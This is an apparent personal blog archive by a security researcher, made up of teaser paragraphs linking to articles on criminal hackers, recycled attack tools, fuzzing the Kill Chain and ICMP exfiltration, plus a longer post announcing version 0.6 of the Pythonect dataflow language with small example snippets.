Wednesday, December 12, 2018

Staying One Step Ahead Of Criminal Hackers

In our efforts to stay one step ahead of the global criminal hacker cabal, my colleagues and I in the ethical hacker community try to approach our craft like our adversaries. To paraphrase Carl Spackler, we know that, in order to conquer the hacker, we have to learn to think like hackers. We’ve got to get inside the hacker’s pelt and crawl around. When you do that, you develop a begrudging respect for them.

In popular culture, however, criminal hackers can become mythologized, not unlike the way the bank robbers of old were. Despite their chosen professions, the likes of John Dillinger, Bonnie and Clyde, Baby Face Nelson and Ma Barker were sometimes regarded as modern-day Robin Hoods. They were the little guys taking on the rich and powerful with daring and panache. Even when caught, they’d often revel in the attention. When asked why he robbed banks, the infamous “Slick” Willie Sutton supposedly quipped, “Because that’s where the money is.”

That may have been true in the first half of the last century, but not anymore.

Read the full article at Forbes here

Friday, August 24, 2018

Were You Attacked Today With Yesterday's Hacking Technique?

We’re all familiar with the idea of recycling as a means of reducing the waste stream. Most of us are in the habit of separating our paper, plastic, glass and metal trash from other garbage. What you may not know is that recycling is a major trend in the hacker community, too. Many of the data breaches that have struck in recent years were accomplished using software that has been around for a long time -- today’s hack, yesterday’s technique.

Tools that have been proven effective at fooling users and sneaking past network defenses are regularly reused by hackers. Whether the software was developed specifically for hacking or as a tool with a legitimate purpose that has been adapted for a less savory one, the hacker community has become expert at extracting value from what already exists. As with commercial software development, it takes time and money for hackers to write and test their code, and in order to maximize their profits, it makes sense to recycle what works. Often, these tried-and-true products are packaged and sold to others, furthering their potential to do harm.

Read the full article at Forbes here

Wednesday, June 6, 2018

Fixating On Vulnerabilities Is A Vulnerability

You almost have to admire the hackers. Almost. Technology research firm Gartner (via Forbes) estimates that companies will spend $93 billion on cybersecurity technologies in 2018. Yet, according to a recent study by security firm Norton (via MIT Technology Review), the relentless efforts of the global hacking community still netted $172 billion in ill-gotten gains. There’s no indication that things will be any different this year. Why do the hackers continue to succeed? What must industry do to make hacking a less profitable venture for the adversary?

To better understand and answer these questions, it’s useful to examine the hackers’ successes and look for consistencies. But first, let’s define a word that is often misused or misunderstood in cybersecurity discussions: vulnerability.

Read the full article at Forbes here

Thursday, February 16, 2017

The Key To Cybersecurity: Shared Intelligence And Industry Cooperation

Chicago in the 1930s was a hive of organized crime where the bad guys always had the upper hand. As dramatized by the film "The Untouchables," lawman Eliot Ness confides to Officer Jim Malone that he is prepared to do “everything within the law” to take down Al Capone. But streetwise Malone tells Ness that, to win, he must be prepared to do more. “He pulls a knife, you pull a gun. He sends one of yours to the hospital, you send one of his to the morgue. That’s the Chicago way.”

Like ‘30s Chicago, the dark web is crawling with global crime syndicates, and everyone I've talked to says fighting the Chicago way sounds appealing. The problem is that the same laws that make hacking a crime also make it a crime to retaliate.

Read full article at Forbes here

Wednesday, July 13, 2016

Fuzzing The Kill Chain

Fuzzing is a technique in software testing where you generate a number of random inputs, and see how a program handles it. So what does a testing technique have to do with a process such as the Cyber Kill Chain as developed by Lockheed Martin? Easy! Just as fuzzing a software produces resilient software, fuzzing a process will produce a validated process. The Kill Chain takes about seven steps that adversaries must complete in order to achieve their goals, but will it always be the case? Can an attacker pull off a successful attack with just one step? Or three? That’s what we’re going to fuzz out ...

(Again, in order to avoid cross-posting between the different blogs, that was just a brief paragraph and a link to the original post is below).

Continue reading: https://www.safebreach.com/blog/fuzzing-the-kill-chain

Wednesday, December 2, 2015

I See Your True ECHO_REQUEST Patterns (Pinging Data Away)

I've started blogging again! In order to avoid cross-posting between the different blogs, I'll just give a brief paragraph and a link back to the original post. Here we go:

Getting into a network and getting data out of a network are two different challenges. Just because an employee clicked on a malicious link and got hacked, it doesn’t mean the attacker gets to walk off with PII, Financials, Source Code etc. In this blog post, we’ll explore the known breach method of using ICMP protocol for data exfiltration but with a twist. Instead of showing how to use this breach method with some custom made tools, we’re going to do it using the default and common ping utility– red team style!

Continue reading: http://blog.safebreach.com/2015/12/02/i-see-your-true-echo_request-patterns-pinging-data-away/

Wednesday, August 7, 2013

Pythonect Has New Graphs, Documentation, Tutorial, and More!

About two weeks ago I have released a new version of Pythonect (0.6) with new features, documentation, tutorial, and an (small, but growing) example directory.
I’d like to take this opportunity to discuss the past, present and future of the Pythonect Project.

Nearly 2 years ago I started working on Pythonect with the intention to help software developers to connect the dots and make mashup, rapid prototyping, and developing scalable distributed applications easy. Pythonect is a new, experimental, general-purpose dataflow programming language based on Python. It aims to combine the intuitive feel of shell scripting (and all of its perks like implicit parallelism) with the flexibility and agility of Python. Pythonect interpreter (and reference implementation) is a free and open source software written completely in Python, and is available under the BSD 3-Clause license.

Why Pythonect? Pythonect, being a dataflow programming language, treats data as something that originates from a source, flows through a number of processing components, and arrives at some final destination. As such, it is most suitable for creating applications that are themselves focused on the "flow" of data. Perhaps the most readily available example of a dataflow-oriented applications comes from the realm of real-time signal processing, e.g. a video signal processor which perhaps starts with a video input, modifies it through a number of processing components (video filters), and finally outputs it to a video display.

As with video, many applications can be expressed as a network of different components that are connected by a number of communication channels. The benefits, and perhaps the greatest incentives, of expressing an application this way is scalability and parallelism. The different components in the network can be maneuvered to create entirely unique dataflows without necessarily requiring the relationship to be hardcoded. Also, the design and concept of components make it easier to run on distributed systems and parallel processors.

Here is the canonical "Hello, world" example program in Pythonect:
"Hello, world" -> print
And here is the canonical "Hello, world" multi-threaded example program in Pythonect:
"Hello, world" -> [print, print]
Not to mention that you can go from multi-threaded to multi-processed as easy as:
"Hello, world" -> [print &, print &]
Or remotely call a procedure using XML-RPC:
"Hello, world" -> print@xmlrpc://localhost:8081
The language couldn't possibly be simpler...
Okay, so what's new you're asking? *I was wrong*, it can be simpler, and it is in Pythonect version 0.6 :-)

In Pythonect 0.6.0 I have re-written the engine and some large parts of the backend. Pythonect is now using graph (NetworkX. DiGraph) as its data structure, and it's also supporting multiple file formats as an input. Currently, Pythonect (since version 0.6) supports 3 file formats:
  • *.P2Y (text-based scripting language aims to combine the quick and intuitive feel of shell scripting, with the power of Python)
  • *.DIA (visual programming language enabled by Dia)
  • *.VDX (visual programming language enabled by Microsoft Visio XML)
In other words:


is equal to:
"Hello, world" -> print
And vice versa. You can launch (almost) any graph/diagram editor and save a graph/diagram as *.VDX or *.DIA format and Pythonet will be able to parse and run it (even if it's gzipped!). Curious to see how a multi-threading/processing graph looks like? See below!


Yup, it's that simple. One node with two edges. The graph above is equal to:
"Hello, world" -> [print, print]
Which is the canonical "Hello, world" multi-threaded example program. Now, another issue that I have addressed in this release is the reduce functionally.
The famous reduce from big data. Let's say that we want to write a program that will add one to every integer input and eventually sum all the results:
[1,2,3] -> _ + 1 -> sum -> print
The above example won't work because Pythonect maps (think MapReduce) each iterable value to its own thread, so the sum function will actually receive 2, 3, 4 separately and not as a list. A workaround for this will be:
sum(`[1,2,3] -> _+1`) -> print
But with the new reduce functionally in Python 0.6, it is as easy as:
[1,2,3] -> _ + 1 -> sum(_!) -> print
By using the _! Identifier, the Pythonect interrupter will automatically join all the values (and threads/processes) into a single list and pass it to the Python function without any prerequisites. The same applies when using a graph:


is equal to:
[1,2,3] -> _ + 1 -> sum(_!) -> print
Now let's talk about the future of Pythonect. Here's a link to the TODO list, where you can find future directions. In a nutshell, more graphs, more Python implementation support, and more Service-oriented architecture (SOA).

Right now, the biggest application of Pythonect (to the best of my knowledge) is my second project, Hackersh. Hacker Shell (hackersh) is a free and open source command-line shell and scripting language designed especially for security testing. It is written in Python and uses Pythonect as its scripting engine. The upcoming release of Hackersh (work in progress!) will also enjoy the Pythonect 0.6 features such as graphs (*.VDX and *.DIA) as scripts and a better reduce functionally.

To learn more about Pythonect, please visit its homepage: http://www.pythonect.org and be sure to check out the new documentation at: http://docs.pythonect.org/en/latest/ where you can find an up-to-date tutorial and installation instructions.

That's all for now!